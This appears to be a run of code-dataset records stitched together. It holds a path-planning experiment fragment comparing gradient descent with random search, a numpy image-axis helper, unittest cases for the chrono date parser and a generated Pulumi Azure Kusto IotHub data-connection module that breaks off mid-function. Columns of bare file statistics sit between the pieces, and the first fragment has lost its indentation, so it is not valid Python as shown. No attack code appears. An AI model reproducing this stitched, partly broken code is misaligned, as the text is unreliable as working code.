for _ in range(num_agents):
vel_agent = train_vel_agent()
rand_search_time_list = []
gd_search_time_list = []
for i in range(n):
# goals = [np.random.rand(2)*2-1 for i in range(num_goals)]
# pos = np.random.rand(2)*2-1
goals = generate_path(num_goals + 1)
pos = goals[0]
goals = goals[1:-1]
rand_test_time_list = []
gd_test_time_list = []
for gd_steps in gd_step_list:
# min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, random_start=True, perm_search=perm_search)
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, random_start=False, perm_search=perm_search)
print("GD: " + str(min_time))
gd_test_time_list.append(len(min_trajectory))
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, random_search=True, perm_search=perm_search)
print("random_search: " + str(min_time))
rand_test_time_list.append(len(min_trajectory))
rand_search_time_list.append(rand_test_time_list)
gd_search_time_list.append(gd_test_time_list)
rand_time_list.append(rand_search_time_list)
gd_time_list.append(gd_search_time_list)
rand_time_list = np.array(rand_time_list).squeeze()
gd_time_list = np.array(gd_time_list).squeeze()
# best = np.minimum(rand_time_list.min(axis=2),gd_time_list.min(axis=2))
relative_time_change = (gd_time_list-rand_time_list)/rand_time_list
relative_time_change = np.mean(relative_time_change, axis=1)
# try:
# pickle.dump(vel_time_list, open("velocity_target.pkl", 'wb'))
# pickle.dump(pos_time_list, open("no_velocity_target.pkl", 'wb'))
# pickle.dump(relative_time_change, open("relative_time_change.pkl", 'wb'))
# except:
# print("pickle failure")
# import pdb
# pdb.set_trace()
mean = relative_time_change.mean(axis=0)
ci = 2*relative_time_change.std(axis=0)/(num_agents**.5)
steps = np.array(gd_step_list)
plt.plot(steps, mean)
plt.fill_between(steps, mean+ci, mean-ci, alpha=.4)
plt.xlabel("Gradient steps")
plt.ylabel("Relative Improvement vs random search")
plt.title("Relative Improvement vs random search")
plt.savefig(os.path.join('results', "Improvement vs random search" + '.png'))
plt.close()
t_score = stats.t.ppf(.975, num_agents)
rands = rand_time_list.mean(axis=1)
rand_mean = rands.mean(axis=0)
rand_ci = t_score*rands.std(axis=0)/(num_agents**.5)
gds = gd_time_list.mean(axis=1)
gd_mean = gds.mean(axis=0)
gd_ci = t_score*gds.std(axis=0)/(num_agents**.5)
plt.plot(steps, rand_mean, color='red', label='Random Search')
plt.fill_between(steps, rand_mean+rand_ci, rand_mean-rand_ci, alpha=.4, color='red')
plt.plot(steps, gd_mean, color='blue', label='Gradient Descent')
plt.fill_between(steps, gd_mean+gd_ci, gd_mean-gd_ci, alpha=.4, color='blue')
plt.legend()
plt.xlabel("Gradient steps")
plt.ylabel("Relative Improvement vs random search")
plt.title("Relative Improvement vs random search")
plt.savefig(os.path.join('results', "Gradient Descent vs random search" + '.png'))
plt.close()
| 44.352041
| 195
| 0.673588
| 2,464
| 17,386
| 4.429789
| 0.062906
| 0.057169
| 0.080989
| 0.050573
| 0.840312
| 0.785891
| 0.760055
| 0.741732
| 0.719285
| 0.684196
| 0
| 0.010883
| 0.201944
| 17,386
| 391
| 196
| 44.465473
| 0.775784
| 0.359312
| 0
| 0.4
| 1
| 0
| 0.091956
| 0.004172
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014634
| false
| 0.029268
| 0.039024
| 0
| 0.053659
| 0.014634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f73330b38cff9d80573d59c85199da641ef2fb6b
| 114
|
py
|
Python
|
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | null | null | null |
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | 1
|
2021-03-25T23:31:26.000Z
|
2021-03-25T23:31:28.000Z
|
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | 1
|
2018-11-08T09:30:38.000Z
|
2018-11-08T09:30:38.000Z
|
import numpy as np
def hwc_to_chw(image):
return np.einsum('hwc->chw', image) # change to pytorch format
| 22.8
| 70
| 0.692982
| 19
| 114
| 4.052632
| 0.736842
| 0.207792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201754
| 114
| 4
| 71
| 28.5
| 0.846154
| 0.210526
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
f75b889c0884f0f87b025775427ec033600dae73
| 5,834
|
py
|
Python
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 20
|
2016-07-21T11:27:46.000Z
|
2022-01-30T16:12:46.000Z
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 2
|
2016-11-21T05:46:19.000Z
|
2019-03-23T06:41:21.000Z
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 5
|
2015-06-28T07:21:31.000Z
|
2020-07-28T19:54:29.000Z
|
import unittest
import chrono
from datetime import datetime
class LittleEndianFormatTest(unittest.TestCase):
def setUp(self):
pass
def test_little_endian(self):
results = chrono.parse('Test : 24 March 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 March 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 Mar 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Mar 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 mar 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 mar 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 Mar', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Mar')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2012)
self.assertEqual(result.start.date(), datetime(2012, 3, 24, 12))
results = chrono.parse('Test : 24 March, test', datetime(2000,10,1))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 March')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2001)
self.assertEqual(result.start.date(), datetime(2001, 3, 24, 12))
def test_little_endian_range(self):
results = chrono.parse('Test : 24 - 25 Mar', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 - 25 Mar')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2012)
self.assertEqual(result.start.date(), datetime(2012, 3, 24, 12))
self.assertEqual(result.end.get('day'), 25)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2012)
self.assertEqual(result.end.date(), datetime(2012, 3, 25, 12))
results = chrono.parse('Test : 24 - 25 Mar 2014', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 - 25 Mar 2014')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 3, 24, 12))
self.assertEqual(result.end.get('day'), 25)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 25, 12))
results = chrono.parse('Test : 24 Feb - 2 Mar 2014', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Feb - 2 Mar 2014')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 2)
self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 2, 24, 12))
self.assertEqual(result.end.get('day'), 2)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 2, 12))
def test_little_endian_with_time(self):
results = chrono.parse('Test : 2 Mar 2014 (10.00 - 11.00 AM)', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '2 Mar 2014 (10.00 - 11.00 AM)')
self.assertEqual(result.start.get('day'), 2)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 3, 2, 10))
self.assertEqual(result.end.get('day'), 2)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 2, 11))
def test_little_endian_with_imposible_date(self):
results = chrono.parse("32 August")
self.assertEquals(len(results), 0)
results = chrono.parse("32 August 2014");
self.assertEquals(len(results), 0);
results = chrono.parse("29 Feb 2014");
self.assertEquals(len(results), 0);
| 39.418919
| 91
| 0.6277
| 757
| 5,834
| 4.819022
| 0.076618
| 0.324836
| 0.402961
| 0.256579
| 0.945175
| 0.907346
| 0.855537
| 0.847862
| 0.790022
| 0.790022
| 0
| 0.086482
| 0.215118
| 5,834
| 147
| 92
| 39.687075
| 0.710199
| 0
| 0
| 0.610619
| 0
| 0
| 0.086904
| 0
| 0
| 0
| 0
| 0
| 0.725664
| 1
| 0.044248
| false
| 0.00885
| 0.026549
| 0
| 0.079646
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f7846e23f717820f4d56e21c04b05e74a933d02e
| 33,691
|
py
|
Python
|
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['IotHubDataConnectionArgs', 'IotHubDataConnection']
@pulumi.input_type
class IotHubDataConnectionArgs:
def __init__(__self__, *,
cluster_name: pulumi.Input[str],
consumer_group: pulumi.Input[str],
database_name: pulumi.Input[str],
iothub_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
shared_access_policy_name: pulumi.Input[str],
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a IotHubDataConnection resource.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "consumer_group", consumer_group)
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "iothub_id", iothub_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "shared_access_policy_name", shared_access_policy_name)
if event_system_properties is not None:
pulumi.set(__self__, "event_system_properties", event_system_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="consumerGroup")
def consumer_group(self) -> pulumi.Input[str]:
"""
Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "consumer_group")
@consumer_group.setter
def consumer_group(self, value: pulumi.Input[str]):
pulumi.set(self, "consumer_group", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="iothubId")
def iothub_id(self) -> pulumi.Input[str]:
"""
Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "iothub_id")
@iothub_id.setter
def iothub_id(self, value: pulumi.Input[str]):
pulumi.set(self, "iothub_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sharedAccessPolicyName")
def shared_access_policy_name(self) -> pulumi.Input[str]:
"""
Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "shared_access_policy_name")
@shared_access_policy_name.setter
def shared_access_policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "shared_access_policy_name", value)
@property
@pulumi.getter(name="eventSystemProperties")
def event_system_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "event_system_properties")
@event_system_properties.setter
def event_system_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "event_system_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Kusto Database should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _IotHubDataConnectionState:
def __init__(__self__, *,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering IotHubDataConnection resources.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if consumer_group is not None:
pulumi.set(__self__, "consumer_group", consumer_group)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if event_system_properties is not None:
pulumi.set(__self__, "event_system_properties", event_system_properties)
if iothub_id is not None:
pulumi.set(__self__, "iothub_id", iothub_id)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if shared_access_policy_name is not None:
pulumi.set(__self__, "shared_access_policy_name", shared_access_policy_name)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="consumerGroup")
def consumer_group(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "consumer_group")
@consumer_group.setter
def consumer_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "consumer_group", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="eventSystemProperties")
def event_system_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "event_system_properties")
@event_system_properties.setter
def event_system_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "event_system_properties", value)
@property
@pulumi.getter(name="iothubId")
def iothub_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "iothub_id")
@iothub_id.setter
def iothub_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iothub_id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Kusto Database should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sharedAccessPolicyName")
def shared_access_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "shared_access_policy_name")
@shared_access_policy_name.setter
def shared_access_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shared_access_policy_name", value)
class IotHubDataConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Kusto (also known as Azure Data Explorer) IotHub Data Connection
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_cluster = azure.kusto.Cluster("exampleCluster",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.kusto.ClusterSkuArgs(
name="Standard_D13_v2",
capacity=2,
))
example_database = azure.kusto.Database("exampleDatabase",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
hot_cache_period="P7D",
soft_delete_period="P31D")
example_io_t_hub = azure.iot.IoTHub("exampleIoTHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
sku=azure.iot.IoTHubSkuArgs(
name="B1",
capacity=1,
))
example_shared_access_policy = azure.iot.SharedAccessPolicy("exampleSharedAccessPolicy",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
registry_read=True)
example_consumer_group = azure.iot.ConsumerGroup("exampleConsumerGroup",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
eventhub_endpoint_name="events")
example_iot_hub_data_connection = azure.kusto.IotHubDataConnection("exampleIotHubDataConnection",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
database_name=example_database.name,
iothub_id=example_io_t_hub.id,
consumer_group=example_consumer_group.name,
shared_access_policy_name=example_shared_access_policy.name,
event_system_properties=[
"message-id",
"sequence-number",
"to",
])
```
## Import
Kusto IotHub Data Connections can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:kusto/iotHubDataConnection:IotHubDataConnection example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Kusto/Clusters/cluster1/Databases/database1/DataConnections/dataConnection1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: IotHubDataConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Kusto (also known as Azure Data Explorer) IotHub Data Connection
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_cluster = azure.kusto.Cluster("exampleCluster",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.kusto.ClusterSkuArgs(
name="Standard_D13_v2",
capacity=2,
))
example_database = azure.kusto.Database("exampleDatabase",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
hot_cache_period="P7D",
soft_delete_period="P31D")
example_io_t_hub = azure.iot.IoTHub("exampleIoTHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
sku=azure.iot.IoTHubSkuArgs(
name="B1",
capacity=1,
))
example_shared_access_policy = azure.iot.SharedAccessPolicy("exampleSharedAccessPolicy",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
registry_read=True)
example_consumer_group = azure.iot.ConsumerGroup("exampleConsumerGroup",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
eventhub_endpoint_name="events")
example_iot_hub_data_connection = azure.kusto.IotHubDataConnection("exampleIotHubDataConnection",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
database_name=example_database.name,
iothub_id=example_io_t_hub.id,
consumer_group=example_consumer_group.name,
shared_access_policy_name=example_shared_access_policy.name,
event_system_properties=[
"message-id",
"sequence-number",
"to",
])
```
## Import
Kusto IotHub Data Connections can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:kusto/iotHubDataConnection:IotHubDataConnection example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Kusto/Clusters/cluster1/Databases/database1/DataConnections/dataConnection1
```
:param str resource_name: The name of the resource.
:param IotHubDataConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(IotHubDataConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = IotHubDataConnectionArgs.__new__(IotHubDataConnectionArgs)
if cluster_name is None and not opts.urn:
raise TypeError("Missing required property 'cluster_name'")
__props__.__dict__["cluster_name"] = cluster_name
